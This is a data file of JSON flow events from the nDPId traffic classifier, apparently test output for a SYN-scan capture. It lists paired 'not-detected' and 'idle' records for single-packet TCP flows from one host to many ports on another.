+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":845,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":845,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":902,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":902,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":894,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":894,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3050,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":961,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":961,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3050,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5100,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":298,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3052,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":298,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3052,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5100,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":322,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3052,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":322,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3052,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5101,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1026,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5102,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1026,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5101,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1827,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061157,"flow_last_seen":1278275061157,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1007,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1827,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061157,"flow_last_seen":1278275061157,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1079,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5102,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1079,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1904,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1007,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1904,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9200,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":576,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1009,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":576,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9200,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1095,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1095,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":644,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1009,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":644,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1070,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1011,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1070,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1011,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 